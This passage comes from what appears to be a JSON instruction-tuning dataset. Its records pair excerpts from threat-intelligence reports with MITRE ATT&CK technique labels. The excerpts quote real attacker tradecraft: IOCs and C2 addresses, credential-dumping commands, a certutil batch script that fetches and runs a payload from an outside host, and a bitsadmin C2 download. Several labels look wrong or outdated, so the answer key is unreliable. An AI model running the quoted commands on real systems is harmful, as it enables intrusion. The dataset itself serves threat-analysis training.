cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"In December 2018, a thread on HackForums described a change in the ownership and ongoing development of the HawkEye keylogger.Shortly following this exchange, new posts began to appear that were attempting to market and sell new versions of HawkEye (HawkEye Reborn v9), with these new posts also referencing the change in ownership of the project moving forward.HawkEye Reborn v9 is currently marketed as an \"\"Advance Monitoring Solution.\"\" It is currently being sold using a licensing model, with purchasers gaining access to the software and updates for different periods based on a tiered pricing model.HawkEye Reborn v9 also features a Terms of Service agreement that provides some additional insight\"", + "output": "- T1008: Fallback Channels\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indicators File Hash Description x.js 3fefa55daeb167931975c22df3eca20a HOMEFRY, a 64-bit Windows password dumper/cracker mt.exe 40528e368d323db0ac5c3f5e1efe4889 MURKYTOP, a command-line reconnaissance tool\u00a0 com4.js a68bf5fce22e7f1d6f999b7a580ae477 AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages Historical Indicators File Hash Description green.ddd 3eb6f85ac046a96204096ab65bbd3e7e AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages BGij 6e843ef4856336fe3ef4ed27a4c792b1 Beacon, a commercially available backdoor msresamn.ttf a9e7539c1ebe857bae6efceefaa9dd16 PHOTO, also reported as Derusbi 1024-aa6a121f98330df2edee6c4391df21ff43a33604 bd9e4c82bf12c4e7a58221fc52fed705 BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indicators of compromise MITRE ATT&CK techniques Modify existing service Code signing File deletion Deobfuscate/decode files or information System information discovery Process discovery Service execution RunDLL32 Scripting Command-line Interface Data from local system Automated exfiltration Data encrypted Commonly used port Bypass user account control Hashes fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 f684e15dd2e84bac49ea9b89f9b2646dc32a2477 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 19d9573f0b2c2100accd562cc82d57adb12a57ec f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 f3b62fea38cb44e15984d941445d24e6b309bc7b 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 d41daba0ebfa55d0c769ccfc03dbf6a5221e006a 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c 35ab747c15c20da29a14e8b46c07c0448cef4999 e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 bca861a46d60831a3101c50f80a6d626fa99bf16 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 5a6ad7a1c566204a92dd269312d1156d51e61dc4 1dc50bfcab2bc80587ac900c03e23afcbe243f64 003e21b02be3248ff72cc2bfcd05bb161b6a2356 9b7c3c48bcef6330e3086de592b3223eb198744a 85e2453b37602429596c9681a8c58a5c6faf8d0c Domains ftp.byethost31.com ftp.byethost11.com 1113427185.ifastnet.org navermail.byethost3.com nihon.byethost3.com", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indirect Code Execution Through INF and SCT This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018", + "output": "- T1064: Scripting\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt: c:\\programdata\\w.exe \u2013w \u2013l \u2013c>>c:\\programdata\\w.txt In a separate incident, the threat actor used access provided by extensive web shell deployment to harvest account credentials: 2016-10-03T09:27:47 dir 2016-10-03T09:28:11 w64.log >ppp.log 2016-10-03T09:30:10 PowerShell.exe -ExecutionPolicy Bypass -File getpwd.ps1 >iistail.log In another example, BRONZE UNION leveraged the Kekeo credential abuse tool to exploit CVE-2014-6324, a vulnerability in Microsoft's implementation of the Kerberos network authentication protocol", + "output": "- T1003: OS Credential Dumping\n- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In other cases, threat actors placed web shells on externally accessible servers, sometimes behind a reverse proxy, to execute commands on the compromised system", + "output": "- T1059: Command and Scripting Interpreter\n- T1090: Proxy\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In particular, the threat actors have exploited CVE-2011-3544, a vulnerability in the Java Runtime Environment, to deliver the HttpBrowser backdoor; and CVE-2010-0738, a vulnerability in JBoss, to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code", + "output": "- T1203: Exploitation for Client Execution\n- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file: \"\"C:\\Windows\\system32\\cmd.exe\"\" /C systeminfo >> \"\"C:\\Ahnlab\\$$$A24F.TMP\"\" \"\"C:\\WINDOWS\\system32\\cmd.exe\"\" /C tasklist /v >> \"\"C:\\Ahnlab\\$$$A24F.TMP\"\" NavRAT Capabilities NavRAT is a remote access trojan (RAT) designed to upload, download and execute files\"", + "output": "- T1074: Data Staged\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the following example, archives for exfiltration were renamed as .tmp files: move \\\\{FILE PATH}\\c$\\programdata\\AT.part01.rar \\\\{FILE PATH}\\c$\\programdata\\at01.tmp The TMP files were then staged for exfiltration on Internet-facing servers that had previously been compromised with the China Chopper web shell", + "output": "- T1074: Data Staged\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"In this particular instance, the following script is retrieved:@echo off :if exist \"\"%PROGRAMFILES(x86)%\"\" (GOTO 64BITOS) ELSE (GOTO 32BITOS) :32BITOS certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt > nul certutil -decode -f setup.txt setup.cab > nul del /f /q setup.txt > nul GOTO ISEXIST :64BITOS :certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt > nul :certutil -d^ecode -f setup2.txt setup.cab > nul :del /f /q setup2.txt > nul :GOTO ISEXIST :ISEXIST if exist \"\"setup.cab\"\" (GOTO EXECUTE) ELSE (GOTO EXIT) :EXECUTE ver | findstr /i \"\"10\\.\"\" > nul IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS) :WIN10 expand %TEMP%\\setup.cab -F:* %CD% > nul :if exist \"\"%PROGRAMFILES(x86)%\"\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32 %TEMP%\\drv.dll EntryPoint) %TEMP%\\install.bat GOTO EXIT :OTHEROS wusa %TEMP%\\setup.cab /quiet /extract:%TEMP% > nul %TEMP%\\install.bat GOTO EXIT :EXIT del /f /q setup.cab > nul del /f /q %~dpnx0 > nulThis script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable\"", + "output": "- T1071: Application Layer Protocol\n- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IOCs Domain supservermgr[.]com URL hxxp://supservermgr[.]com/sys/upd/pageupd.php Zebrocy d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 5b5e80f63c04402d0b282e95e32155b2f86cf604a6837853ab467111d4ac15e2 dd7e69e14c88972ac173132b90b3f4bfb2d1faec15cca256a256dd3a12b6e75d Koadic abbad7acd50754f096fdc6551e728aa6054dcf8e55946f90a02b17db552471ca User Agents Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1 IPs 185.25.51[.]198 185.25.50[.]93 220.158.216[.]127 92.114.92[.]102 86.106.131[.]177 DDE Docs 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Irdsnhrxxxfery64 manipulation on userinit.exe & unins000.exe Injection Technique To Increase Stealthiness After locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to evasively create a new process from a legitimate source", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string", + "output": "- T1071: Application Layer Protocol\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language.\u00a0 \u00a0The main module collecting information about the machine", + "output": "- T1016: System Network Configuration Discovery\n- T1087: Account Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell", + "output": "- T1113: Screen Capture\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads: ID Thread description 1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility 2 Decrypts command from registry using RC4 with a hardcoded key, and executes it 3 Transfers screenshots from the clipboard to \\Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the \u201csalamati\u201d key (\u201chealth\u201d in Farsi) 4 Transfers screenshots to \\Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies 5 Checks network connection, encrypts and sends gathered logs 6 Unhooks mouse and keyboard, removes bitsadmin task 7 Checks if malware\u2019s working directory size already exceeds its threshold 8 Gathers victim\u00b4s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads The malware uses the following command to receive data from its C2: bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal http:///asp.asp?ui=nrg-- Activity logging module (Splitter.exe) This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc", + "output": "- T1115: Clipboard Data\n- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It then launches player.exe, a CozyDuke dropper maintaining anti-detection techniques: 3d3363598f87c78826c859077606e514,player.exe,338kb,Trojan.Win32.CozyBear.v,CompiledOn:2014.07.02 21:13:33 Anti-detection and trojan functionality The file collects system information, and then invokes a WMI instance in the root\\securitycenter namespace to identify security products installed on the system, meaning that this code was built for x86 systems, wql here: SELECT * FROM AntiVirusProduct SELECT * FROM FireWallProduct The code hunts for several security products to evade: CRYSTAL KASPERSKY SOPHOS DrWeb AVIRA COMODO Dragon In addition to the WMI/wql use, it also hunts through the \u201cSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\u201d registry key looking for security products to avoid", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "JAVASCRIPT CODE SNIPPETS: The first stage JavaScript copies additional JavaScript code snippets in txt format from the RTF document into a random directory \u201cC:\\Users\\\\\\\u201d", + "output": "- T1064: Scripting\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1124: System Time Discovery\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lateral Movement, Maintain Presence, and Complete Mission APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol\n- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Like the ChinaChopper web shell, the OwaAuth web shell requires a password", + "output": "- T1059: Command and Scripting Interpreter\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malware Capabilities WINDSHIELD Command and control (C2) communications via TCP raw sockets Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications Registry manipulation Get the current module's file name Gather system information including registry values, user name, computer name, and current code page File system interaction including directory creation, file deletion, reading, and writing files Load additional modules and execute code Terminate processes Anti-disassembly KOMPROGO Fully-featured backdoor capable of process, file, and registry management Creating a reverse shell File transfers Running WMI queries Retrieving information about the infected system SOUNDBITE C2 communications via DNS Process creation File upload Shell command execution File and directory enumeration/manipulation Window enumeration Registry manipulation System information gathering PHOREAL C2 communications via ICMP Reverse shell creation Filesystem manipulation Registry manipulation Process creation File upload BEACON (Cobalt Strike) Publicly available payload that can inject and execute arbitrary code into processes Impersonating the security context of users Importing Kerberos tickets Uploading and downloading files Executing shell commands Configured with malleable C2 profiles to blend in with normal network traffic Co-deployment and interoperability with Metasploit framework SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB Table 3: APT32 Malware and Capabilities APT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Obfuscation Mechanism for the JScript Code The malicious JScript code obfuscation relies on two main techniques", + "output": "- T1027: Obfuscated Files or Information\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Office365DCOMCheck.ps1 and SystemDiskClean.ps1): wscript.exe \"\"Office365DCOMCheck.vbs\"\" \\\"\"PowerShell.exe\u00a0\u00a0-ExecutionPolicy bypass -WindowStyle hidden -NoProfile ''\u00a0\u00a0\\\"\" After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex\"", + "output": "- T1012: Query Registry\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Office365DCOMCheck.vbs or SystemDiskClean.vbs) within the %TEMP% folder: CreateObject(\"\"WScript.Shell\"\").Run \"\"\"\" & WScript.Arguments(0) & \"\"\"\", 0, False The scheduled task will then run every five minutes, which provides persistent execution of the downloader script\"", + "output": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting\n- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Old Comnie Variant C2 Decoder 12345678910111213141516171819 import requestsimport sysimport redef decode(data):\u00a0\u00a0o = \"\"\"\"\u00a0\u00a0for c in data:\u00a0\u00a0\u00a0\u00a0if c == \"\"*\"\":\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0o += \"\".\"\"\u00a0\u00a0\u00a0\u00a0elif c == \"\"|\"\":\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0o += \"\":\"\"\u00a0\u00a0\u00a0\u00a0elif c == \"\"+\"\":\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0o += \"\";\"\"\u00a0\u00a0\u00a0\u00a0else:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0o += chr(ord(c)-49)\u00a0\u00a0return or = requests.get(sys.argv[1])fd = r.textdata = fd.split(\"\"++a++\"\")[1].split(\"\"++a++\"\")[0]print(decode(data)) \u00a0 Samples Analyzed eed5945c36ba22a2531dd2d9dd7bc4e17e68544d512be75670919caf287c1b4a 8026442b812469e48ccd11611ab6eacdcb312a8f1aabd563b7f4cb4868315e16 c8951038fd53321661274e5a12532c3fb6f73c75fd75503a1089c56990658fef 48a1ce103e5bf47c47cc5ed40b2dc687ebaf3674d667419287bcb1d0b8d8dda6 e06b797a24fa03a77e0d5f11b0cf0f4f038e0a9ea04d4981d39148969349c79c 7282d0709449abe16457864f58157cac8d007571dc5d463d393d1ae2605d17e0 bf6ee8426245b167a69292e513c0841d818b310dda87daea649221f4e0afd1b3 62b98dde60cb4dd0d0088bde222c5c2c4c92560cccf4753f1ce94e044093ab85 756952652290ad09fe03c8674d44eab2077b091398187c3abcb6f1ddc462c32d 639a49390c6f8597d36ec0bd245efa1b4a078c0506fb515e577a40389b39a614 29ed6eb3c882b018c2bb6bf2f8eb15069dc5510ca119abebf24f09e3c91f10aa 0e8a4e4d5ca501bad25a730fb5de534fa324c6ac23e0a573524693f2d996d105 316a0c6849f183a1a52d0c7648e722c4ca85bd57b0804a147c0c8656b84bbdb9 \u00a0 Identified C2s 121.126.211[.]94:8080 113.196.70[.]11:80,8080 133.130.101[.]47:443 123.51.208[.]157:443;8000;8080 \u00a0 C2 Hosting URLs (DDR URLs) github[.]com/korlee5643 itsmonsee.tumblr[.]com allworldnewsway.blogspot[.]com\"", + "output": "- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine: Deletes the LNK file from the startup directory", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the payload is successfully executed, it will proceed to copy files to the following locations: C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe C:\\ProgramData\\ManagerApp\\15b937.cab C:\\ProgramData\\ManagerApp\\install.cab 